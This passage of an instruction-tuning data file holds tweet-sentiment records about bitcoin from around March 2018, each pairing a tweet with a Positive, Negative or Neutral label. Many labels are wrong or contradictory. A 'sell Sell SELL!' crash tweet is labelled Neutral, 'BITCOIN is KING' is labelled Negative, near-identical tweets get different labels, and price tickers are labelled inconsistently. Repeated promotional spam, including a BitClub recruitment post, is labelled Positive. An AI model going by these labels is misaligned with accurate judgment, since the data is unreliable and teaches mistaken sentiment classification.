#bitcoin $BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@seanhannity Silver and gold, silver and gold #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "[me, hanging out with a bunch of pretentious hipsters]\n\n\u201cSo bitcoin, amiright?\u201d", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@QTRResearch bitcoin is not the same as blockchain. one is a derivative of a system that doesn't need to exist.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin. The obvious king", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@aliasvaughn Bitcoin, money laundering, TT, etc. 
So many to choose from.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin/litecoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitfury-Backed Bitcoin Miner Secures Canadian Land Deal...", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 03:56:46 2018 (2:45)\nUSD : 8416.97\nWght: 0.42\nBlk#: 514753\nSize: 159.6 KB\nTXs: 338\nPool: 55 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@cz_binance Bitcoin is crashing! sell Sell SELL!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Shorting bitcoin until downtrend is confirmed broken (not a joke)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@bitcoinyuri @Blockstream Sorry, no longer interested in Bitcoin.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Litecoin IMHO short term. Bitcoin is long term. The higher you are, the farther you have to fall.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 0000000000000000005148b477c1afed7f77e76e5cf192d9b5bbb8c1804e1c6f mined at height 514754.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 03:58:01 2018 (1:15)\nUSD : 8425.35\nWght: 0.42\nBlk#: 514754\nSize: 6.3 KB\nTXs: 22\nPool: 172 (0.1 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@bittybitbit86 Yeah it\u2019s ridiculous. 
Even worst case scenario that it gets shut down barely makes a dent in bitcoin future adoption", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "it's called bitcoin because it's only worth a lil bit", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Footy_Cash bitcoin\uff1f", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@APompliano Bitcoin and litecoin will be used. With smart contract and there technology there no limit. \u26a1\ufe0f\ud83d\ude80", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30498.98000000 | BITCOIN(BLCHAIN) R$27938.63 | LITECOIN(MCDTBC) R$577.10000000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NischalShetty Correction : Bitcoin is backed by math", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio If they could have than Bitcoin would of been shut down long time ago !", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DrewPflaum @BITCOlNCASH @BitcoinCashFund @BCHmeetups Sorry, not interested in Bitcoin Cash.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio #BITCOIN is KING all day long.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "You can buy 1995 Big Macs with 1 Bitcoin \u2b07\ud83c\udf54", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bad news: Bitcoin on the decline.\nCurrent Rate: 8428.81 USD = 1 BTC", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ #1, Bitcoin with unit price of $8,451.49, market cap of $143,120,802,387 (44.31%), and 24 hr vol. of $5,441,800,000 (37.52%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mar 22, 2018 08:00PM #Bitcoin Price:\nUSD 8695.66 | EUR 7048.24 | JPY 929250.00", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin - BTC\nPrice: $8,444.87\nChange in 1h: -2.2%\nMarket cap: $143,008,485,623.00\nRanking: 1\n#Bitcoin #BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current BTC Dominance: 44.31% #Bitcoin #Altcoin #Cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8444.87\nEthereum:$516.81\nBitcoin Cash:$970.829\nLitecoin:$158.655\nRipple:$0.635307\nIOTA:$1.27057", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I wish I could drop acid as hard as the price of Bitcoin.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8451.49 / 6859.651\u20ac\n1 bitcoin-cash = $970.829 / 787.973\u20ac\n1 ethereum = $516.85 / 419.501\u20ac\n#bitcoin #ethereum #bitcoincash", "output": 
"Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Average Bitcoin market price is: USD 8,434.24, EUR 6,841.88", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "2018-03-23 03:00 UTC Bitcoin Price: 8422.79 USD", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "How could bitcoin be affected by a trade war?\n\nThe only trade war bitcoin is having right now is with the moon.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NischalShetty #Bitcoin is backed by math", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Cryptopia will be listing ColossusCoinXT ( $COLX) #cryptocurrency #blockchain #bitcoin #crypto #btc #ico #eth #xrp #trading #CryptoNews", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 #BTC (#Bitcoin) quotes:\n$8424.70/$8437.59 #Bitstamp\n$8430.50/$8439.20 #Kraken\n\u21e2$-7.09/$14.50\n$8376.90/$8461.10 #Coinbase\n\u21e2$-60.69/$36.40", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Top 6 BTC/USD Exchange Orderbooks: Resistance til $8700:$24.2M; Support til $8200:$43.5M $BTC $BTCUSD #bitcoin #orderbook #markets #crypto", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin Price 8419.00 USD via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NoTimeToSearch @cz_binance \ud83d\ude02\ud83d\ude02\ud83d\ude02people have such a small vision. How can you not see what bitcoin and blockchain technology is capable of.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003329 (-0.00000013) #BTC / 0.279434 (-0.00121) #USD. Market rank is 13. 
#nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004690 (-0.00000024) #BTC / 0.393709 (-0.00216) #USD. Market rank is 115. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0471977 (-0.00010940) #BTC / 396.804 (-4.38800) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00078357 (+0.00000543) #BTC / 6.58764 (+0.05346) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC hourly update\n$8443.18 | -0.0203%\ud83d\udcc9\n$BTC #BTCUSD #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002267 (+0.00000000) #BTC / 0.190569 (+0.00023) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "once bitcoin dominance hits around 50%+ that\u2019s when the market will reverse and get health. calling it rn #ALTSEASONCOMEBAAAACCCCKKKK", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Dear @Snowden and @coinbase, Please #STFU. Sincerely, all #Crypto investors. #xrp #ripple #bitcoin #VergeFam #tron #trx", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin has inherent value as a decentralized currency but its current valuation is a bubble waiting to burst. 
#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin $8,429.15 v #BitcoinCash $968.57 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 12:00JST", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8419.00", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "once bitcoin dominance hits around 50%+ that\u2019s when the market will reverse and get healthy. calling it rn #ALTSEASONCOMEBAAAACCCCKKKK", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@benshapiro What are your thoughts on Bitcoin/Litecoin and other crypto currencies?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ledgerstatus Well said! 
Bitcoin is still young in financial terms, though growing quickly!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Have we hit rock bottom in crypto yet?\n\n#Crypto #Blockchain #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8419.00.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8419.00", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@blackwidowgrl You\u2019re welcome sweetie and lol on bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@benshapiro What are you thoughts on Bitcoin/Litecoin and other crypto currencies?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Good job #bitcoin #BTTC2018", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The price of Bitcoin is $8419.00 right...now. \ud83d\udd51", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8419.00 \u201cLike\u201d if thats good for you and \u201cretweet\u201d if thats not good for you #bitcoin #btc #bitcoinprice", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin is currently tired of going into space and visiting the moon.\n\nSeems like the Earth's core is a new destination. \u2668\ufe0f#BTC $BTC", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 04:03:18 2018 (5:17)\nUSD : 8407.19\nWght: 0.42\nBlk#: 514755\nSize: 610.1 KB\nTXs: 822\nPool: 83 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 0000000000000000004c95477f37ba7d0d5501f8476fb07720f81d41ae1c1ced mined at height 514755.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TeaPainUSA Bitcoin regs?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC $8444.87 Down -$198.43 -2.35% in the last hour #bitcoin #bitsmart", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BITCOIN IS AT 8407.1875", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cointelegraph Sorry, no longer interested in Bitcoin.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@gavinandresen Are you at the Satoshi Vision Bitcoin Cash conference?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin Let's wait and see if a project supported by censored forum only could have any future.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "seungri talking about bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@maximalistsnews More Bitcoin is More!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN\nJOIN BITCLUB NETWORK!!!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Hell_HasCome Buy bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "help \nI only have $70\n\nI dont want to die\n\nbitcoin addless \n1A5WPUwEBm1sGzpKh4CpT5W2hfKEVcG4hu", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 04:07:13 2018 (3:55)\nUSD : 8412.55\nWght: 0.42\nBlk#: 514756\nSize: 253.7 KB\nTXs: 448\nPool: 18 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Blockchain_Jay Bitcoin, Cardando, Ripple, EOS, BAT, NEO, Enjin, WAX.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "OMG Bitcoin is the new vaping", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000032e872239890eb7c362c008137845b7dcefbdb66a4e7ce mined at height 514756.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$SANUSD entering oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "fifth speaker @Satoshis_Vision @vermorel \nTerabyte blocks :)\n\n\"bandwidth is the most solved problem of #bitcoin.\"", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Thank you to the @NODEfather for this opportunity and thank you to the bitcoin community for letting me be your champion.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@charliebxrnes bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8453.59 / 6861.356\u20ac\n1 bitcoin-cash = $972.231 / 789.111\u20ac\n1 ethereum = $517.53 / 420.054\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin BTC Current Price:\n$8.453,590\n1 Hour: -2.02 % | 24 Hours: -6.81 % | 7 Days: 2.73 %\n#btc #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@KingRippleXRP Bitcoin to $5000 soon", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@coindesk Binance doesn't even sell bitcoin for JPY...", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "fifth speaker @Satoshis_Vision @vermorel \nTerabyte blocks :)\n\n\"nowadays backing #bitcoin has improved, by quite a lot.\"", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@GreedPositive @ThrowingBugs @Bitcoin Reported for abusing twitter to spread propaganda for BSCore.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TechnicalCrypto That reinforces the argument to me that bitcoin should correlate.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SallyMayweather @theemrsmcafee This is why we need #bitcoin as well", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge @Falkvinge is very clever.\n\nBCH is REAL bitcoin.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8413.86", "output": "Neutral"}, 
{"instruction": "Detect the sentiment of the tweet.", "input": "@AP4Liberty And sound money. Buy #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@whalecalls \nShould we get ready for round 2?\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BigCheds Anynews on bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RealKidPoker Bitcoin millionaire", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoWaffles damn liked this thinking you were joking about bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Don't be such a bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The #Bitcoin pizza is worth $85,360,325 today. (-7% from yesterday)", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin hands down", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@joerogan What about Bitcoin money???", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current Bitcoin Price = $9425.27 --- Includes Sum of Forks, Core $8402.00 (89.14%) + Cash $966.23 (10.25%) + Gold $57.04 (0.61%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Apple Bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8451.29.\nThe current price of BCash is $972.231, or 0.115678 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. 
Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@mattmilsap @Bitcoin @Satoshi_N_ I really doubt if you are mocking #BCore altcoin supporters by doing so.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@sic_null @SpoonGuru21 @rogerkver @Falkvinge Nope, BTC stole Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio always bitcoin it does control the market. but Etherum or other powerful infrastructures like Neo", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Zuckerberg vs. the Winklevoss twins. Who\u2019s the loser now? The identity seller or the billionaire bitcoin twins.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "In just 73 minutes a day you can reinvigorate your career. 
#bitcoin #clickbait", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 04:16:23 2018 (9:10)\nUSD : 8407.42\nWght: 0.42\nBlk#: 514757\nSize: 561.7 KB\nTXs: 1016\nPool: 61 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Cash BCH Current Price:\n$972,231\n1 Hour: -2.89 % | 24 Hours: -8.03 % | 7 Days: 4.92 %\n#bch #bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 000000000000000000366f5650d6ba3cf62682e44f541f9224004b8af7d25a5c mined at height 514757.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Retweet if you agree that Bitcoin is the new gold #bitcoin #bitcoins #bitcoinisgold #bitcoinworld #bitcoinnews", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cryptos_Aus As long as it's not the fraudster bitcoin-fund-manager ?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New stable coin idea: Everything is priced in #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC-HMQ AskRate: 0.00001119 #Bittrex #HMQ $HMQ #Humaniq #altcoin #crypto #bitcoin\n \u2665 FOLLOW for PROFIT", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8440.05 / 6850.366\u20ac\n1 bitcoin-cash = $970.851 / 787.991\u20ac\n1 ethereum = $517.001 / 419.624\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Don't let the #Binance #FUD today distract you. #Bitcoin $BTC will bounce back.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@syd_viciously Bitcoin was created by the CIA?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Terabyte blocks - 50 txns a day for 10 billion people. Bitcoin can scale on chain. No layer 2 needed.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RichardHeartWin However, bitcoin is going way lower regardless..", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Whenever I contemplate whether or not to sell Bitcoin, I think of the \"Goodbye moon man\" song from Rick and Morty.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is barely even fun anymore. $XBT BTC", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CoinStructive #shirtgate Hey @ellypriZeMaN we need you more than ever. 
~Bitcoin Belle \ud83c\udf37", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@LandlordRescue I\u2019m inventing a better bitcoin so should be good to go!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@LoganPaul watch out for the death cross in ur bitcoin investment ,look it up check it out protect ur money", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Dow Jones going down.\nBitcoin was supposed to shield.\nFucking suits- leave us!\n\n$BTC #crypto #haiku", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "our uber driver has his business card on the dash and it says \u201cbitcoin miner\u201d as his job title", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ProfFaustus Bitcoin is not a philosophy...... BCH is not Bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@itsmelissabrown remember how early they were on writing about bitcoin??? nuts in retrospect", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JakeNTech New options: \n1. Water Cooled Laptop, WetCoin\u2122!\n2. Two Computa, Two BitCoin!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "All in on Diet Bitcoin. Escobars brother guarantees profit lol", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "50k tokens reserved for private investors\n\n#Ethereum #ZOMBI #ZOMBIcoin #Bitcoin #ICO", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The Thrive Labs Team is launching a revolutionary Premium Decentralized Advertising Marketplace.\n#thrive #ico #ethereum #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I hate ween people exploit things and ruin the fun for everyone. 
First Youtube, now bitcoin/cryptos \ud83d\ude27\ud83d\ude27", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I see all the Bitcoin ppl stopped talkin \ud83d\ude2d", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "wat if unified Korea becomes the next cuba & disrupts global power um Bitcoin n stuff", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8431.5\nEthereum:$515.604\nBitcoin Cash:$966.799\nLitecoin:$158.548\nRipple:$0.631444\nIOTA:$1.26867", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8431.5 / 6843.426\u20ac\n1 bitcoin-cash = $966.799 / 784.702\u20ac\n1 ethereum = $515.604 / 418.489\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Bitcoin now worth $8413.81@bitstamp. High $9055.330. Low $8342.000. Market Cap $142.481 Billion #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Bitcoin now worth $8413.81@bitstamp. High $9055.330. Low $8342.000. Market Cap $142.481 Billion #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@welovefaucet I have the same problem in both We Love Bitcoin and Play Bitcoin.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004617 (-0.00000073) #BTC / 0.385999 (-0.00771) #USD. Market rank is 116. 
#substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin>>>>>", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00078017 (-0.00000340) #BTC / 6.52226 (-0.06538) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003301 (-0.00000028) #BTC / 0.275969 (-0.00347) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002258 (-0.00000009) #BTC / 0.188787 (-0.00178) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0481372 (+0.00093950) #BTC / 402.431 (+5.62700) #USD. Market rank is 11. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "This couple loves bitcoin so much that they decided to have a bitcoin themed wedding. Most of their guests gave them bitcoin as a gift!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hello humans, #Bitcoin is currently around $8428.55 as of Thu Mar 22 22:31:11 CDT 2018", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8430.81", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin still. I've been stockpiling and putting it in my 